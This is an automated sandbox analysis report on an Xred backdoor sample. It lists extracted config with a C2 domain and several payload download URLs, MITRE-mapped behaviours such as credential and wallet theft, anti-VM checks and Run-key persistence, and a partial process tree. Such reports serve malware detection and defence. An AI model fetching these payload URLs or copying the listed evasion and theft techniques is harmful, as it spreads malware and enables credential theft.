xred | b8e3aa8d2afa51793ea4651315e8909c5d8860145f50a2de416ae657d76fef0d

Analysis

max time kernel
189s
max time network
187s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
04-12-2024 17:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ggggggggggg.txt
Size

181B
MD5

ddf5e50a6e91ccc0c9c218e433cefdbe
SHA1

2413a1e0f510ee401da0f5c00879df2b204fc915
SHA256

b8e3aa8d2afa51793ea4651315e8909c5d8860145f50a2de416ae657d76fef0d
SHA512

30cd99d47b7c050ba081cb35bb50f0becf9fde159ca595ffa12e5864e4e074eaaa5a69ebb48d42f8b9eadf26621f9e033acc22805df910443c61118c98e8bda9

Score

10^/10

xred backdoor collection credential_access defense_evasion discovery evasion execution persistence pyinstaller spyware stealer trojan upx

Malware Config

Extracted

Family

xred

xred.mooo.com

Attributes

email
[email protected]
payload_url
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1

http://xred.site50.net/syn/SUpdate.ini

https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download

https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1

http://xred.site50.net/syn/Synaptics.rar

https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download

https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1

http://xred.site50.net/syn/SSLLibrary.dll

Signatures

Xred
Xred is backdoor written in Delphi.
backdoor xred
Xred family
xred

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	main.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4044	powershell.exe
5776	powershell.exe
2988	powershell.exe
4696	powershell.exe
548	powershell.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	main.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	main.exe

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	Synaptics.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	._cache_loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	Google Chrome.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	._cache_Google Chrome.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	loader.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
2964	cmd.exe
3516	powershell.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google Chrome.exe	Google Chrome.exe

Executes dropped EXE 16 IoCs

pid	Process
4192	loader.exe
1040	Host Process for Windows Services.exe
3708	Host Process for Windows Services.exe
3924	loader.exe
2988	._cache_loader.exe
3676	Synaptics.exe
1768	._cache_Synaptics.exe
1636	Google Chrome.exe
4752	loader.exe
1132	loader.exe
644	._cache_Google Chrome.exe
856	maple.exe
5664	Google Chrome.exe
5608	Google Chrome.exe
3932	main.exe
5824	rar.exe

Loads dropped DLL 64 IoCs

pid	Process
3708	Host Process for Windows Services.exe
3708	Host Process for Windows Services.exe
3708	Host Process for Windows Services.exe
3708	Host Process for Windows Services.exe
3708	Host Process for Windows Services.exe
3708	Host Process for Windows Services.exe
3708	Host Process for Windows Services.exe
3708	Host Process for Windows Services.exe
3708	Host Process for Windows Services.exe
3708	Host Process for Windows Services.exe
3708	Host Process for Windows Services.exe
3708	Host Process for Windows Services.exe
3708	Host Process for Windows Services.exe
3708	Host Process for Windows Services.exe
3676	Synaptics.exe
3676	Synaptics.exe
3708	Host Process for Windows Services.exe
3708	Host Process for Windows Services.exe
3708	Host Process for Windows Services.exe
1132	loader.exe
1132	loader.exe
1132	loader.exe
1132	loader.exe
1132	loader.exe
1132	loader.exe
1132	loader.exe
1132	loader.exe
1132	loader.exe
5608	Google Chrome.exe
5608	Google Chrome.exe
5608	Google Chrome.exe
5608	Google Chrome.exe
5608	Google Chrome.exe
5608	Google Chrome.exe
5608	Google Chrome.exe
5608	Google Chrome.exe
5608	Google Chrome.exe
5608	Google Chrome.exe
5608	Google Chrome.exe
5608	Google Chrome.exe
5608	Google Chrome.exe
5608	Google Chrome.exe
5608	Google Chrome.exe
5608	Google Chrome.exe
5608	Google Chrome.exe
5608	Google Chrome.exe
5608	Google Chrome.exe
5608	Google Chrome.exe
5608	Google Chrome.exe
5608	Google Chrome.exe
5608	Google Chrome.exe
5608	Google Chrome.exe
5608	Google Chrome.exe
5608	Google Chrome.exe
5608	Google Chrome.exe
5608	Google Chrome.exe
5608	Google Chrome.exe
5608	Google Chrome.exe
5608	Google Chrome.exe
5608	Google Chrome.exe
5608	Google Chrome.exe
5608	Google Chrome.exe
5608	Google Chrome.exe
5608	Google Chrome.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe"	loader.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	main.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service

T1102

flow	ioc
111	discord.com
113	discord.com
134	discord.com
94	discord.com
95	discord.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
74	ip-api.com
62	api.ipify.org
70	api.ipify.org

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
2288	tasklist.exe
2284	tasklist.exe
5756	tasklist.exe
1932	tasklist.exe

UPX packed file 46 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023c8c-237.dat	upx
behavioral2/memory/3708-245-0x00007FFF5FDE0000-0x00007FFF603C8000-memory.dmp	upx
behavioral2/files/0x0007000000023c87-267.dat	upx
behavioral2/memory/3708-269-0x00007FFF76000000-0x00007FFF7600F000-memory.dmp	upx
behavioral2/memory/3708-268-0x00007FFF66330000-0x00007FFF66354000-memory.dmp	upx
behavioral2/files/0x0007000000023c86-266.dat	upx
behavioral2/files/0x0007000000023c85-265.dat	upx
behavioral2/files/0x0007000000023c84-264.dat	upx
behavioral2/files/0x0007000000023c83-263.dat	upx
behavioral2/files/0x0007000000023c82-262.dat	upx
behavioral2/files/0x0007000000023c81-261.dat	upx
behavioral2/files/0x0008000000023c7d-260.dat	upx
behavioral2/files/0x0007000000023c93-259.dat	upx
behavioral2/files/0x0007000000023c92-258.dat	upx
behavioral2/files/0x0007000000023c8f-256.dat	upx
behavioral2/files/0x0007000000023c8b-253.dat	upx
behavioral2/files/0x0007000000023c89-252.dat	upx
behavioral2/files/0x0007000000023c8a-251.dat	upx
behavioral2/files/0x0007000000023c80-249.dat	upx
behavioral2/memory/3708-411-0x00007FFF663D0000-0x00007FFF663FD000-memory.dmp	upx
behavioral2/memory/3708-464-0x00007FFF65190000-0x00007FFF65303000-memory.dmp	upx
behavioral2/memory/3708-463-0x00007FFF663A0000-0x00007FFF663C3000-memory.dmp	upx
behavioral2/memory/3708-460-0x00007FFF73B00000-0x00007FFF73B19000-memory.dmp	upx
behavioral2/memory/3708-488-0x00007FFF650D0000-0x00007FFF65188000-memory.dmp	upx
behavioral2/memory/3708-487-0x00007FFF5FDE0000-0x00007FFF603C8000-memory.dmp	upx
behavioral2/memory/3708-493-0x00007FFF66360000-0x00007FFF66374000-memory.dmp	upx
behavioral2/memory/3708-492-0x00007FFF66330000-0x00007FFF66354000-memory.dmp	upx
behavioral2/memory/3708-496-0x00007FFF64B70000-0x00007FFF64C8C000-memory.dmp	upx
behavioral2/memory/3708-491-0x00007FFF75820000-0x00007FFF7582D000-memory.dmp	upx
behavioral2/memory/3708-489-0x00007FFF64D50000-0x00007FFF650C5000-memory.dmp	upx
behavioral2/memory/3708-477-0x00007FFF661B0000-0x00007FFF661DE000-memory.dmp	upx
behavioral2/memory/3708-476-0x00007FFF758B0000-0x00007FFF758BD000-memory.dmp	upx
behavioral2/memory/3708-475-0x00007FFF66380000-0x00007FFF66399000-memory.dmp	upx
behavioral2/memory/3708-598-0x00007FFF663A0000-0x00007FFF663C3000-memory.dmp	upx
behavioral2/memory/3708-737-0x00007FFF64B70000-0x00007FFF64C8C000-memory.dmp	upx
behavioral2/memory/3708-733-0x00007FFF650D0000-0x00007FFF65188000-memory.dmp	upx
behavioral2/memory/3708-732-0x00007FFF661B0000-0x00007FFF661DE000-memory.dmp	upx
behavioral2/memory/3708-730-0x00007FFF66380000-0x00007FFF66399000-memory.dmp	upx
behavioral2/memory/3708-738-0x00007FFF65190000-0x00007FFF65303000-memory.dmp	upx
behavioral2/memory/3708-734-0x00007FFF64D50000-0x00007FFF650C5000-memory.dmp	upx
behavioral2/memory/3708-723-0x00007FFF5FDE0000-0x00007FFF603C8000-memory.dmp	upx
behavioral2/memory/3708-724-0x00007FFF66330000-0x00007FFF66354000-memory.dmp	upx
behavioral2/memory/3708-2005-0x00007FFF65190000-0x00007FFF65303000-memory.dmp	upx
behavioral2/memory/3708-2000-0x00007FFF66330000-0x00007FFF66354000-memory.dmp	upx
behavioral2/memory/3708-1999-0x00007FFF5FDE0000-0x00007FFF603C8000-memory.dmp	upx
behavioral2/memory/3708-2100-0x00007FFF5FDE0000-0x00007FFF603C8000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral2/files/0x0009000000023c9c-1206.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 21 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Google Chrome.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	curl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	curl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	curl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Google Chrome.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	curl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	curl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	curl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	loader.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Google Chrome.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	curl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Synaptics.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
5940	WMIC.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
2228	systeminfo.exe

Kills process with taskkill 2 IoCs

evasion

pid	Process
5260	taskkill.exe
5500	taskkill.exe

Modifies registry class 3 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Google Chrome.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Synaptics.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
2416	NOTEPAD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1456	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2656	msedge.exe
2656	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
4492	identity_helper.exe
4492	identity_helper.exe
3244	msedge.exe
3244	msedge.exe
548	powershell.exe
548	powershell.exe
4696	powershell.exe
4696	powershell.exe
4044	powershell.exe
4044	powershell.exe
4696	powershell.exe
548	powershell.exe
4044	powershell.exe
1132	loader.exe
1132	loader.exe
1132	loader.exe
1132	loader.exe
1132	loader.exe
1132	loader.exe
1132	loader.exe
1132	loader.exe
1132	loader.exe
1132	loader.exe
1132	loader.exe
1132	loader.exe
1132	loader.exe
1132	loader.exe
1132	loader.exe
1132	loader.exe
1132	loader.exe
1132	loader.exe
1132	loader.exe
1132	loader.exe
1132	loader.exe
1132	loader.exe
1132	loader.exe
1132	loader.exe
1132	loader.exe
1132	loader.exe
1132	loader.exe
1132	loader.exe
1132	loader.exe
1132	loader.exe
1132	loader.exe
1132	loader.exe
1132	loader.exe
1132	loader.exe
1132	loader.exe
1132	loader.exe
1132	loader.exe
1132	loader.exe
1132	loader.exe
1132	loader.exe
1132	loader.exe
1132	loader.exe
1132	loader.exe
1132	loader.exe
1132	loader.exe
1132	loader.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	4248	7zG.exe
Token: 35	4248	7zG.exe
Token: SeSecurityPrivilege	4248	7zG.exe
Token: SeSecurityPrivilege	4248	7zG.exe
Token: SeDebugPrivilege	548	powershell.exe
Token: SeDebugPrivilege	4696	powershell.exe
Token: SeDebugPrivilege	4044	powershell.exe
Token: SeDebugPrivilege	1132	loader.exe
Token: SeDebugPrivilege	1932	tasklist.exe
Token: SeDebugPrivilege	2288	tasklist.exe
Token: SeIncreaseQuotaPrivilege	1644	WMIC.exe
Token: SeSecurityPrivilege	1644	WMIC.exe
Token: SeTakeOwnershipPrivilege	1644	WMIC.exe
Token: SeLoadDriverPrivilege	1644	WMIC.exe
Token: SeSystemProfilePrivilege	1644	WMIC.exe
Token: SeSystemtimePrivilege	1644	WMIC.exe
Token: SeProfSingleProcessPrivilege	1644	WMIC.exe
Token: SeIncBasePriorityPrivilege	1644	WMIC.exe
Token: SeCreatePagefilePrivilege	1644	WMIC.exe
Token: SeBackupPrivilege	1644	WMIC.exe
Token: SeRestorePrivilege	1644	WMIC.exe
Token: SeShutdownPrivilege	1644	WMIC.exe
Token: SeDebugPrivilege	1644	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1644	WMIC.exe
Token: SeRemoteShutdownPrivilege	1644	WMIC.exe
Token: SeUndockPrivilege	1644	WMIC.exe
Token: SeManageVolumePrivilege	1644	WMIC.exe
Token: 33	1644	WMIC.exe
Token: 34	1644	WMIC.exe
Token: 35	1644	WMIC.exe
Token: 36	1644	WMIC.exe
Token: SeDebugPrivilege	2284	tasklist.exe
Token: SeDebugPrivilege	4072	powershell.exe
Token: SeDebugPrivilege	3516	powershell.exe
Token: SeIncreaseQuotaPrivilege	1644	WMIC.exe
Token: SeSecurityPrivilege	1644	WMIC.exe
Token: SeTakeOwnershipPrivilege	1644	WMIC.exe
Token: SeLoadDriverPrivilege	1644	WMIC.exe
Token: SeSystemProfilePrivilege	1644	WMIC.exe
Token: SeSystemtimePrivilege	1644	WMIC.exe
Token: SeProfSingleProcessPrivilege	1644	WMIC.exe
Token: SeIncBasePriorityPrivilege	1644	WMIC.exe
Token: SeCreatePagefilePrivilege	1644	WMIC.exe
Token: SeBackupPrivilege	1644	WMIC.exe
Token: SeRestorePrivilege	1644	WMIC.exe
Token: SeShutdownPrivilege	1644	WMIC.exe
Token: SeDebugPrivilege	1644	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1644	WMIC.exe
Token: SeRemoteShutdownPrivilege	1644	WMIC.exe
Token: SeUndockPrivilege	1644	WMIC.exe
Token: SeManageVolumePrivilege	1644	WMIC.exe
Token: 33	1644	WMIC.exe
Token: 34	1644	WMIC.exe
Token: 35	1644	WMIC.exe
Token: 36	1644	WMIC.exe
Token: SeDebugPrivilege	5756	tasklist.exe
Token: SeDebugPrivilege	5260	taskkill.exe
Token: SeDebugPrivilege	5500	taskkill.exe
Token: SeDebugPrivilege	5776	powershell.exe
Token: SeDebugPrivilege	5328	powershell.exe
Token: SeIncreaseQuotaPrivilege	6092	WMIC.exe
Token: SeSecurityPrivilege	6092	WMIC.exe
Token: SeTakeOwnershipPrivilege	6092	WMIC.exe
Token: SeLoadDriverPrivilege	6092	WMIC.exe

Suspicious use of FindShellTrayWindow 54 IoCs

pid	Process
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
4248	7zG.exe
3156	msedge.exe

Suspicious use of SendNotifyMessage 28 IoCs

pid	Process
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe
3156	msedge.exe

Suspicious use of SetWindowsHookEx 8 IoCs

pid	Process
1456	EXCEL.EXE
1456	EXCEL.EXE
1456	EXCEL.EXE
1456	EXCEL.EXE
1456	EXCEL.EXE
1456	EXCEL.EXE
1456	EXCEL.EXE
1456	EXCEL.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3156 wrote to memory of 3640	3156	msedge.exe	85
PID 3156 wrote to memory of 3640	3156	msedge.exe	85
PID 3156 wrote to memory of 4580	3156	msedge.exe	86
PID 3156 wrote to memory of 4580	3156	msedge.exe	86
PID 3156 wrote to memory of 4580	3156	msedge.exe	86
PID 3156 wrote to memory of 4580	3156	msedge.exe	86
PID 3156 wrote to memory of 4580	3156	msedge.exe	86
PID 3156 wrote to memory of 4580	3156	msedge.exe	86
PID 3156 wrote to memory of 4580	3156	msedge.exe	86
PID 3156 wrote to memory of 4580	3156	msedge.exe	86
PID 3156 wrote to memory of 4580	3156	msedge.exe	86
PID 3156 wrote to memory of 4580	3156	msedge.exe	86
PID 3156 wrote to memory of 4580	3156	msedge.exe	86
PID 3156 wrote to memory of 4580	3156	msedge.exe	86
PID 3156 wrote to memory of 4580	3156	msedge.exe	86
PID 3156 wrote to memory of 4580	3156	msedge.exe	86
PID 3156 wrote to memory of 4580	3156	msedge.exe	86
PID 3156 wrote to memory of 4580	3156	msedge.exe	86
PID 3156 wrote to memory of 4580	3156	msedge.exe	86
PID 3156 wrote to memory of 4580	3156	msedge.exe	86
PID 3156 wrote to memory of 4580	3156	msedge.exe	86
PID 3156 wrote to memory of 4580	3156	msedge.exe	86
PID 3156 wrote to memory of 4580	3156	msedge.exe	86
PID 3156 wrote to memory of 4580	3156	msedge.exe	86
PID 3156 wrote to memory of 4580	3156	msedge.exe	86
PID 3156 wrote to memory of 4580	3156	msedge.exe	86
PID 3156 wrote to memory of 4580	3156	msedge.exe	86
PID 3156 wrote to memory of 4580	3156	msedge.exe	86
PID 3156 wrote to memory of 4580	3156	msedge.exe	86
PID 3156 wrote to memory of 4580	3156	msedge.exe	86
PID 3156 wrote to memory of 4580	3156	msedge.exe	86
PID 3156 wrote to memory of 4580	3156	msedge.exe	86
PID 3156 wrote to memory of 4580	3156	msedge.exe	86
PID 3156 wrote to memory of 4580	3156	msedge.exe	86
PID 3156 wrote to memory of 4580	3156	msedge.exe	86
PID 3156 wrote to memory of 4580	3156	msedge.exe	86
PID 3156 wrote to memory of 4580	3156	msedge.exe	86
PID 3156 wrote to memory of 4580	3156	msedge.exe	86
PID 3156 wrote to memory of 4580	3156	msedge.exe	86
PID 3156 wrote to memory of 4580	3156	msedge.exe	86
PID 3156 wrote to memory of 4580	3156	msedge.exe	86
PID 3156 wrote to memory of 4580	3156	msedge.exe	86
PID 3156 wrote to memory of 2656	3156	msedge.exe	87
PID 3156 wrote to memory of 2656	3156	msedge.exe	87
PID 3156 wrote to memory of 5040	3156	msedge.exe	88
PID 3156 wrote to memory of 5040	3156	msedge.exe	88
PID 3156 wrote to memory of 5040	3156	msedge.exe	88
PID 3156 wrote to memory of 5040	3156	msedge.exe	88
PID 3156 wrote to memory of 5040	3156	msedge.exe	88
PID 3156 wrote to memory of 5040	3156	msedge.exe	88
PID 3156 wrote to memory of 5040	3156	msedge.exe	88
PID 3156 wrote to memory of 5040	3156	msedge.exe	88
PID 3156 wrote to memory of 5040	3156	msedge.exe	88
PID 3156 wrote to memory of 5040	3156	msedge.exe	88
PID 3156 wrote to memory of 5040	3156	msedge.exe	88
PID 3156 wrote to memory of 5040	3156	msedge.exe	88
PID 3156 wrote to memory of 5040	3156	msedge.exe	88
PID 3156 wrote to memory of 5040	3156	msedge.exe	88
PID 3156 wrote to memory of 5040	3156	msedge.exe	88
PID 3156 wrote to memory of 5040	3156	msedge.exe	88
PID 3156 wrote to memory of 5040	3156	msedge.exe	88
PID 3156 wrote to memory of 5040	3156	msedge.exe	88
PID 3156 wrote to memory of 5040	3156	msedge.exe	88
PID 3156 wrote to memory of 5040	3156	msedge.exe	88

C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\ggggggggggg.txt
1⤵
- Opens file in notepad (likely ransom note)
PID:2416

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3156
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff75ed46f8,0x7fff75ed4708,0x7fff75ed4718
  2⤵
  PID:3640
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,10270391950444796762,2318448749543669637,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:2
  2⤵
  PID:4580
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
